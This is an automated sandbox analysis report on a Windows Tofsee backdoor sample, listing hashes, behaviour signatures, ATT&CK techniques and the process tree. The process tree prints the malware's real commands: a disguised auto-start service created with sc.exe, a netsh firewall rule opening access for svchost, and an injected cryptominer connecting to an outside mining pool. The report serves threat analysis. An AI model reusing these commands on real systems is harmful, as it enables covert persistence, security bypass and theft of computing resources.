Analysis

  • max time kernel
    142s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15-11-2020 23:22

General

  • Target

    7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe

  • Size

    10.1MB

  • MD5

    229fce13dd32013ad5550ccd66cc9620

  • SHA1

    90630678b1100c0cdbc3100bdd91656ca6478399

  • SHA256

    7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206

  • SHA512

    53f7ed10967818c239508f91a0cd112a856331510a7ec7bc8898e4a636a634f09a9d1908ebaa489d6ef1f90a3144693154e44017e357d71f7dd06c73489f0be9

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe
    "C:\Users\Admin\AppData\Local\Temp\7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:308
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uhjsrtwi\
      2⤵
        PID:1796
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kntncnye.exe" C:\Windows\SysWOW64\uhjsrtwi\
        2⤵
          PID:1292
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create uhjsrtwi binPath= "C:\Windows\SysWOW64\uhjsrtwi\kntncnye.exe /d\"C:\Users\Admin\AppData\Local\Temp\7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1248
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description uhjsrtwi "wifi internet conection"
            2⤵
              PID:268
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start uhjsrtwi
              2⤵
                PID:560
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                • Modifies service
                PID:324
            • C:\Windows\SysWOW64\uhjsrtwi\kntncnye.exe
              C:\Windows\SysWOW64\uhjsrtwi\kntncnye.exe /d"C:\Users\Admin\AppData\Local\Temp\7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe"
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1624
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                2⤵
                • Deletes itself
                • Drops file in System32 directory
                • Modifies service
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious use of WriteProcessMemory
                PID:108
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1220

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            New Service

            1
            T1050

            Modify Existing Service

            2
            T1031

            Registry Run Keys / Startup Folder

            1
            T1060

            Privilege Escalation

            New Service

            1
            T1050

            Defense Evasion

            Disabling Security Tools

            1
            T1089

            Modify Registry

            3
            T1112

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\kntncnye.exe
              MD5

              77da4486b0c7be0c9066a01d6cfb9eaa

              SHA1

              592f9c41ce4478149f4002be04bb6a93940d3049

              SHA256

              b84bd7a62dff69d7bec280de9a43e6978dcef16c56aa732b7977fe4731d3d6b7

              SHA512

              7da7b9e50e7a13b96a349b74a5fd66dd19395ac8431071fb0a8fa1c6a1e075843caf9cc7bd656930972d040b9c7a655f7cf4786c264420151ac00941ebf55b3a

            • C:\Windows\SysWOW64\uhjsrtwi\kntncnye.exe
              MD5

              77da4486b0c7be0c9066a01d6cfb9eaa

              SHA1

              592f9c41ce4478149f4002be04bb6a93940d3049

              SHA256

              b84bd7a62dff69d7bec280de9a43e6978dcef16c56aa732b7977fe4731d3d6b7

              SHA512

              7da7b9e50e7a13b96a349b74a5fd66dd19395ac8431071fb0a8fa1c6a1e075843caf9cc7bd656930972d040b9c7a655f7cf4786c264420151ac00941ebf55b3a

            • memory/108-18-0x0000000000210000-0x0000000000215000-memory.dmp
              Filesize

              20KB

            • memory/108-15-0x0000000001D40000-0x0000000001F4F000-memory.dmp
              Filesize

              2.1MB

            • memory/108-13-0x00000000000C9A6B-mapping.dmp
            • memory/108-12-0x00000000000C0000-0x00000000000D5000-memory.dmp
              Filesize

              84KB

            • memory/108-20-0x0000000000560000-0x0000000000567000-memory.dmp
              Filesize

              28KB

            • memory/108-19-0x00000000059F0000-0x0000000005DFB000-memory.dmp
              Filesize

              4.0MB

            • memory/108-17-0x0000000000110000-0x0000000000120000-memory.dmp
              Filesize

              64KB

            • memory/108-14-0x00000000000C0000-0x00000000000D5000-memory.dmp
              Filesize

              84KB

            • memory/108-16-0x0000000000100000-0x0000000000106000-memory.dmp
              Filesize

              24KB

            • memory/268-6-0x0000000000000000-mapping.dmp
            • memory/308-0-0x0000000000D25000-0x0000000000D26000-memory.dmp
              Filesize

              4KB

            • memory/308-1-0x0000000001040000-0x0000000001051000-memory.dmp
              Filesize

              68KB

            • memory/324-9-0x0000000000000000-mapping.dmp
            • memory/560-7-0x0000000000000000-mapping.dmp
            • memory/1220-24-0x00000000001F259C-mapping.dmp
            • memory/1220-22-0x0000000000160000-0x0000000000251000-memory.dmp
              Filesize

              964KB

            • memory/1220-21-0x0000000000160000-0x0000000000251000-memory.dmp
              Filesize

              964KB

            • memory/1248-5-0x0000000000000000-mapping.dmp
            • memory/1292-3-0x0000000000000000-mapping.dmp
            • memory/1624-10-0x0000000000295000-0x0000000000296000-memory.dmp
              Filesize

              4KB

            • memory/1624-11-0x0000000000CC0000-0x0000000000CD1000-memory.dmp
              Filesize

              68KB

            • memory/1796-2-0x0000000000000000-mapping.dmp